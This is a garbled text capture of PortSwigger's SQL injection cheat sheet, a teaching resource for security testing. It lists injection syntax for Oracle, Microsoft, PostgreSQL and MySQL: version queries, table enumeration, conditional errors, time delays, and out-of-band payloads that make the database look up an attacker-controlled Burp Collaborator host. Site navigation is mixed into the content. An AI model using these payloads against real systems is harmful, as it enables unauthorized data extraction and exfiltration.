1.1 SQL Injection Cheat Sheet
1.1 SQL Injection Cheat Sheet
String concatenation
Vulnerability labs: V
You can concatenate together multiple strings to make a single string.
34%
Oracle 'foo'||'bar'
Microsoft 'foo'+'bar'
PostgreSQL 'foo'||'bar' Level progress:
MySQL 'foo' 'bar' [Note the space between the two strings]
11 32
CONCAT('foo','bar') of 32 of 88 o
You can extract part of a string, from a specified offset with a specified length. Note that the offset index is 1-based.
Each of the following expressions will return the string ba. Your level:
Comments
You can use comments to truncate a query and remove the portion of the original query that follows your input. SQL injection cheat sheet
Database version
You can query the database to determine its type and version. This information is useful when formulating more All topics
complicated attacks. SQL injection
Oracle SELECT banner FROM v$version XSS
SELECT version FROM v$instance CSRF
Clickjacking
Microsoft SELECT @@version DOM-based
PostgreSQL SELECT version() CORS
XXE
MySQL SELECT @@version SSRF
Request smuggling
Database contents Command injection
You can list the tables that exist in the database, and the columns that those tables contain. Server-side template injecti
Directory traversal
Oracle SELECT * FROM all_tables Access control
SELECT * FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE' Web cache poisoning
Microsoft SELECT * FROM information_schema.tables WebSockets
SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-
HERE'
https://portswigger.net/web-security/sql-injection/cheat-sheet 1/3
7/5/2020 SQL injection cheat sheet | Web Security Academy
Oracle SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN to_char(1/0) ELSE NULL END FROM
dual TRY FOR FREE
Microsoft SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1/0 ELSE NULL END
PostgreSQL SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN cast(1/0 as text) ELSE NULL END
MySQL SELECT IF(YOUR-CONDITION-HERE,(SELECT table_name FROM
information_schema.tables),'a')
Time delays
You can cause a time delay in the database when the query is processed. The following will cause an unconditional
time delay of 10 seconds.
Oracle dbms_pipe.receive_message(('a'),10)
DNS lookup
You can cause the database to perform a DNS lookup to an external domain. To do this, you will need to use Burp
Collaborator client to generate a unique Burp Collaborator subdomain that you will use in your attack, and then poll
the Collaborator server to confirm that a DNS lookup occurred.
Oracle The following technique leverages an XML external entity (XXE) vulnerability to trigger a DNS lookup.
The vulnerability has been patched but there are many unpatched Oracle installations in existence:
SELECT extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE
root [ <!ENTITY % remote SYSTEM "http://YOUR-SUBDOMAIN-
HERE.burpcollaborator.net/"> %remote;]>'),'/l') FROM dual
The following technique works on fully patched Oracle installations, but requires elevated privileges:
SELECT UTL_INADDR.get_host_address('YOUR-SUBDOMAIN-
HERE.burpcollaborator.net')
https://portswigger.net/web-security/sql-injection/cheat-sheet 2/3
7/5/2020 SQL injection cheat sheet | Web Security Academy
HERE.burpcollaborator.net'
MySQL The following techniques work on Windows only:
LOAD_FILE('\\\\YOUR-SUBDOMAIN-HERE.burpcollaborator.net\\a')
SELECT ... INTO OUTFILE '\\\\YOUR-SUBDOMAIN-HERE.burpcollaborator.net\a'
Sophos XG Firewall
0day vulnerability
Bug Bounty Radar // Ma
Bug Bounty Radar // April 2020 gets patched ParamSpider
2020
New web targets for the discerning New tool helps in the discovery of URL
27 April 2020 New web targets for the discer
hacker parameter vulnerabilities
hacker
30 April 2020 27 April 2020
31 March 2020
Web vulnerability scanner Cross-site scripting (XSS) Organizations About Web Security Academy
Burp Suite Editions SQL injection Testers PortSwigger News Blog
Release Notes Cross-site request forgery Developers Careers Research
Follow us
XML external entity injection Contact The Daily Swig
Directory traversal Legal
Server-side request forgery Privacy Notice © 2020 PortSwigger Ltd
https://portswigger.net/web-security/sql-injection/cheat-sheet 3/3